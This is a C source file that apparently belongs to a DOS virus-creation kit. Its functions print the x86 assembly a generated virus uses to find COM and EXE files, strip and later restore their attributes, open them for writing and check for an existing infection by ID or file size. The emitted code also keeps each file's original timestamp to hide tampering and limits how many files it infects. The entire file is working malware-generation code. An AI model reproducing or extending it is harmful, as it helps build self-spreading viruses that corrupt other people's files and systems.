/* FILE: VCHECK.C */
#include "vheader.h"

void checkCOM(void);
void code_exit_code_check(char c);

void code_check(void)
{
  if (config.p.resident)
    printlabel("infectDSDX:","");
  else {
    if (config.p.calls_check)
      printlabel("infect_mask:","");
    print("mov  ah,4eh","find first file");
    print("mov  cx,7","any attribute");
    printlabel("findfirstnext:","");
    print("int  21h","DS:DX points to mask");
    if (config.p.calls_check)
      print("jc   exit_infect_mask","No mo files found");
    else
      print("jc   done_infections","No mo files found");
    printblank();
  }
  if (config.p.resident) {
    print("mov  ax,4300h","");
    int_21();
    print("push ds","");
    print("push dx","");
    print("push cx","Save attributes");
  }
  print("xor  cx,cx","Clear attributes");
  print("call attributes","Set file attributes");
  printblank();
  print("mov  ax,3d02h","Open read/write");
  int_21();
  print("xchg ax,bx","");
  printblank();

  if (config.p.resident) {
    print("mov  ax,5700h","Get creation date/time");
    int_21();
    print("push cx","Save date and");
    print("push dx","time");
    printblank();
  }

  if (config.p.resident) {
    print("push cs","DS = CS");
    print("pop  ds","");
    print("push cs","ES = CS");
    print("pop  es","");
  }
  print("mov  ah,3fh","Read file to buffer");
  lea_dx_stuff("buffer","@ DS:DX");
  print("mov  cx,1Ah","1Ah bytes");
  int_21();
  printblank();
  print("mov  ax,4202h","Go to end of file");
  print("xor  cx,cx","");
  print("cwd","");
  int_21();
  printblank();
  if (config.p.resident) {
    addheap("filesize","dd ?","");
    print("mov  word ptr filesize,ax","");
    print("mov  word ptr filesize+2,dx","");
  }
  if (config.p.infectEXE) {
    if (config.p.infectCOM) {
      relative("cmp  word ptr ","buffer",",'ZM'","EXE?");
      print("jz   checkEXE","Why yes, yes it is!");
      checkCOM();
    }
    printlabel("checkEXE:","");
    relative("cmp  word ptr ","buffer+10h",",id","is it already infected?");
    print("jnz  infect_exe","");
  } else {
    if (config.p.resident) {
      relative("cmp  word ptr ","buffer",",'ZM'","EXE?");
      print("jz  done_file","Can't handle 'em");
    }
    checkCOM();
  }
  printlabel("done_file:","");
  print("mov  ax,5701h","Restore creation date/time");
  if (config.p.resident)
  {
    print("pop  dx","Restore date and");
    print("pop  cx","time");
  } else {
    relative("mov  cx,word ptr ","newDTA+16h","","time");
    relative("mov  dx,word ptr ","newDTA+18h","","date");
  }
  int_21();
  printblank();
  print("mov  ah,3eh","Close file");
  int_21();
  printblank();
  if (config.p.resident) {
    print("pop  cx","");
    print("pop  dx","");
    print("pop  ds","Restore filename");
  } else {
    print("mov  ch,0","");
    relative("mov  cl,byte ptr ","newDTA+15h","","Restore original");
  }
  print("call attributes","attributes");
  printblank();
  if (config.maxinfect && !config.p.resident)
  {
    relative("cmp  byte ptr ","numinfec",", 0","Enough infections?");
    print("jnz  find_next","");
    if (config.p.calls_check)
      print("pop  ax","remove call from stack");
    print("jmp  done_infections","");
    printblank();
  }
  if (!config.p.resident) {
    printlabel("find_next:","");
    print("mov  ah,4fh","find next file");
    print("jmp  short findfirstnext","");
    if (config.p.calls_check) {
      printlabel("exit_infect_mask: ret","");
      printblank();
    }
  } else
    print("jmp  exithandler","");
}

void checkCOM(void)
{
  char s[80];

  printlabel("checkCOM:","");
  if (!config.p.resident) {
    if (!config.p.CommandCom)
    {
      relative("mov  ax,word ptr ","newDTA+35","","Get tail of filename");
      print("cmp  ax,'DN'","Ends in ND? (commaND)");
      print("jz   find_next","");
      printblank();
    }
    relative("mov  ax,word ptr ","newDTA+1Ah","","Filesize in DTA");
  } else
    print("mov  ax,word ptr filesize","");
  if (config.minsize)
  {
    if (config.minsize == 1) /* automatic calculation */
      if (config.p.encrypt)
        strcpy(s,"cmp  ax,(heap-decrypt)");
      else
        strcpy(s,"cmp  ax,(heap-startvirus)");
    else  /* if (minsize != 1) */
      sprintf(s,"cmp  ax,%u",config.minsize);
    print(s,"Is it too small?");
    code_exit_code_check('b');
    printblank();
  }
  if (config.maxsize)
  {
    if (config.maxsize == 1) /* automatic calculation */
      if (config.p.encrypt)
        strcpy(s,"cmp  ax,65535-(endheap-decrypt)");
      else
        strcpy(s,"cmp  ax,65535-(endheap-startvirus)");
    else
      sprintf(s,"cmp  ax,%u",config.maxsize);
    print(s,"Is it too large?");
    code_exit_code_check('a');
    printblank();
  }

  relative("mov  cx,word ptr ","buffer+1","","get jmp location");
//  if (config.p.encrypt)
//    print("add  cx,heap-decrypt+3","Adjust for virus size");
//  else
    print("add  cx,heap-startvirus+3","Adjust for virus size");
  print("cmp  ax,cx","Already infected?");
  code_exit_code_check('e');
  print("jmp  infect_com","");
}

void code_exit_code_check(char c)
{
  char b[80];

  if (config.p.resident)
    sprintf(b,"j%c   done_file",c);
  else
    sprintf(b,"j%c   find_next",c);

  print(b,"");
}
